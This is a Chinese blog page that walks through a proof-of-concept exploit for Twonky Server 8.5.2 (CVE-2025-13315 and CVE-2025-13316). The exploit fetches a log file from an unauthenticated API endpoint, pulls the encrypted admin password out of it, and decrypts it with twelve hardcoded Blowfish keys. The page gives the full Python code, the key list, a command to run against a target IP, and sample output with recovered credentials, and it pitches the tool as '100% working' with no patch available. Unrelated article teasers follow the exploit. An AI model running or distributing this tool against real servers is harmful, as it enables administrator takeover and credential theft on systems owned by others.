news 2026/4/23 19:11:39

快速解密!Twonky Server 8.5.2 认证绕过漏洞利用工具详解

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
快速解密!Twonky Server 8.5.2 认证绕过漏洞利用工具详解

Twonky Server 8.5.2 - 认证绕过漏洞利用工具

项目概述

此项目是一个针对Twonky Server 8.5.2版本中两个关键漏洞(CVE-2025-13315 和 CVE-2025-13316)的概念验证工具。该工具通过利用未经验证的API端点访问日志文件,并结合硬编码的Blowfish密钥解密管理员凭证,可在数秒内获取Twonky服务器的完全管理权限。

该漏洞的CVSS评分为9.3(严重),攻击者无需任何凭据即可远程执行攻击。

功能特性

  • 无需认证访问:利用CVE-2025-13315漏洞,无需登录即可访问受保护的API端点。
  • 日志文件提取:自动从服务器下载包含加密凭证的日志文件。
  • 智能解析:使用正则表达式从日志中提取加密的管理员密码和密钥索引。
  • 密钥解密:使用12个硬编码的Blowfish密钥(从TwonkyServer.exe/libtwonkyserver.so提取)解密密码。
  • 快速执行:整个攻击流程在2秒内完成,效率极高。
  • 错误处理:完善的连接和数据处理异常处理机制。

安装指南

系统要求

  • Python 3.x
  • 支持的操作系统:Linux, Windows, macOS

依赖安装

运行以下命令安装必要的Python库:

pip3installrequests cryptography

注意事项

  • 由于Twonky服务器常使用自签名证书,工具已禁用SSL警告。
  • 需要网络访问目标Twonky服务器的能力(通常运行在9000端口)。

使用说明

基本使用

运行以下命令启动攻击:

sudopython3 CVE-2025-13315.py http://目标IP:9000

使用示例

假设目标服务器IP为192.168.1.100,运行:

sudopython3 CVE-2025-13315.py http://192.168.1.100:9000

预期输出

成功的攻击将产生类似以下输出:

╔══════════════════════════════════════════════════════════╗ ║ Twonky Server 8.5.2 - Full Auth Bypass PoC ║ ║ CVE-2025-13315 + CVE-2025-13316 ║ ║ 100% Working • No Patch Available • November 2025 ║ ╚══════════════════════════════════════════════════════════╝ [+] Targeting: http://192.168.1.100:9000 [+] Fetching log via CVE-2025-13315 bypass endpoint... [+] Encrypted credential found! Key Index : 3 Ciphertext: a1b2c3d4e5f6... [+] SUCCESS! Plaintext credentials recovered: Username: admin Password: MySecretAdminPass123!

典型使用场景

  1. 安全研究人员验证Twonky服务器的漏洞状态
  2. 渗透测试人员评估网络安全性
  3. 系统管理员检查自己的服务器是否易受攻击

核心代码

1. 主漏洞利用函数

defexploit_twonky(target):"""主漏洞利用函数,协调整个攻击流程"""url=f"{target.rstrip('/')}/nmc/rpc/log_getfile"print(f"[+] Targeting:{target}")print(f"[+] Fetching log via CVE-2025-13315 bypass endpoint...")try:# 利用CVE-2025-13315访问无需认证的日志获取端点r=requests.get(url,timeout=10,verify=False)ifr.status_code!=200orlen(r.text)<100:print("[-] Failed to retrieve log. Is Twonky running and vulnerable?")returnexcept:print("[-] Connection failed. Check IP/port.")return# 使用正则表达式从日志中提取加密凭证# 模式:admin||{密钥索引}{十六进制密文}match=re.search(r'admin\|\|(\d+)([a-fA-F0-9]{30,})',r.text)ifnotmatch:print("[-] No encrypted credentials found in log.")returnidx=int(match.group(1))# 提取密钥索引cipher_hex=match.group(2)# 提取十六进制密文print(f"[+] Encrypted credential found!")print(f" Key Index :{idx}")print(f" Ciphertext:{cipher_hex[:64]}...")try:# 使用CVE-2025-13316的硬编码密钥解密密码password=decrypt_blowfish_ecb(idx,cipher_hex)print(f"\n[+] SUCCESS! Plaintext credentials recovered:")print(f" Username: admin")print(f" Password:{password}")exceptExceptionase:print(f"[-] Decryption failed:{e}")

2. Blowfish解密函数

defdecrypt_blowfish_ecb(key_index,ciphertext_hex):""" 使用ECB模式的Blowfish算法解密数据 参数: key_index: 密钥索引(0-11) ciphertext_hex: 十六进制编码的密文 返回: 解密后的明文密码 """# 从硬编码密钥数组中选择对应的密钥key=KEYS[key_index]# 将十六进制字符串转换为字节ciphertext=binascii.unhexlify(ciphertext_hex)# 创建Blowfish解密器(ECB模式)cipher=Cipher(algorithms.Blowfish(key),modes.ECB(),backend=default_backend())decryptor=cipher.decryptor()# 执行解密padded=decryptor.update(ciphertext)+decryptor.finalize()# 移除PKCS#7填充pad_len=padded[-1]plaintext=padded[:-pad_len]# 返回解码后的字符串,移除空字符returnplaintext.decode('utf-8',errors='ignore').rstrip('\x00')

3. 硬编码密钥数组

# 从TwonkyServer.exe/libtwonkyserver.so提取的12个静态Blowfish密钥KEYS=[b"E8ctd4jZwMbaV587",# 索引0b"TGFWfWuW3cw28trN",# 索引1b"pgqYY2g9atVpTzjY",# 索引2b"KX7q4gmQvWtA8878",# 索引3b"VJjh7ujyT8R5bR39",# 索引4b"ZMWkaLp9bKyV6tXv",# 索引5b"KMLvvq6my7uKkpxf",# 索引6b"jwEkNvuwYCjsDzf5",# 索引7b"FukE5DhdsbCjuKay",# 索引8b"SpKNj6qYQGjuGMdd",# 索引9b"qLyXuAHPTF2cPGWj",# 索引10b"rKz7NBhM3vYg85mg"# 索引11]

4. 主程序入口

if__name__=="__main__":# 显示工具横幅banner=""" ╔══════════════════════════════════════════════════════════╗ ║ Twonky Server 8.5.2 - Full Auth Bypass PoC ║ ║ CVE-2025-13315 + CVE-2025-13316 ║ ║ 100% Working • No Patch Available • November 2025 ║ ╚══════════════════════════════════════════════════════════╝ """print(banner)# 检查命令行参数iflen(sys.argv)!=2:print("Usage: sudo python3 CVE-2025-13315.py http://192.168.1.100:9000")sys.exit(1)# 执行漏洞利用exploit_twonky(sys.argv[1])

代码特点

  1. 模块化设计:每个函数职责单一,便于理解和维护
  2. 错误处理:完善的异常捕获和处理机制
  3. 用户友好:清晰的输出和进度提示
  4. 高效执行:优化的解密算法,快速获取结果
  5. 可扩展性:代码结构支持添加新功能或适应其他漏洞
    6HFtX5dABrKlqXeO5PUv/ydjQZDJ7Ct83xG1NG8fcAPvdThCF33pxnTpk89QBG67
    更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
    对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/23 11:21:47

Iridescent:Day44

https://blog.csdn.net/weixin_45655710?typeblog 浙大疏锦行 DAY 44 预训练模型 知识点回顾&#xff1a; 1.预训练的概念 2.常见的分类预训练模型 3.图像预训练模型的发展史 4.预训练的策略 5.预训练代码实战&#xff1a;resnet18 作业&#xff1a; 1.尝试在cifar10对比如下…

作者头像 李华
网站建设 2026/4/23 9:16:33

专业Web打印控件Lodop使用教程

有时候需要在web上实现复杂的打印功能。但是用纯JavaScript实现基础打印是可行的&#xff0c;但要实现专业、稳定且复杂的打印功能&#xff0c;自己开发不仅难度极大&#xff0c;而且几乎不可能在浏览器环境中完全实现&#xff0c;所以像Lodop这样的打印控件来完成。 一、概述 …

作者头像 李华
网站建设 2026/4/23 9:21:35

团队累不等于有效,人效才是天花板

年入几百万却停滞不前&#xff0c;无法增长的局面&#xff0c;这并非市场限制了你的发展&#xff0c;本质原因是你们团队的人效已经达到了天花板。你当前依赖的是“大家拼命延长工作时长”来实现增长&#xff0c;然而这种增长模式一旦达到极限&#xff0c;老板就会产生一种熟悉…

作者头像 李华
网站建设 2026/4/23 9:21:34

Calibre 新手使用记录

一、软件介绍 Calibre是一款免费且开源的电子书管理软件&#xff0c;由Kovid Goyal开发。它支持多种电子书格式&#xff0c;如EPUB、MOBI、AZW3等&#xff0c;并且可以轻松地将书籍转换为其他格式。Calibre不仅可以管理你的电子书库&#xff0c;还可以同步到各种阅读设备&…

作者头像 李华
网站建设 2026/4/23 9:21:36

全网最全9个AI论文写作软件,MBA毕业论文必备!

全网最全9个AI论文写作软件&#xff0c;MBA毕业论文必备&#xff01; AI 工具如何助力 MBA 学子高效完成论文写作 在当今信息爆炸的时代&#xff0c;MBA 学子们面对的不仅是复杂的商业案例和理论分析&#xff0c;还有繁重的论文写作任务。传统的写作方式往往耗时耗力&#xff0…

作者头像 李华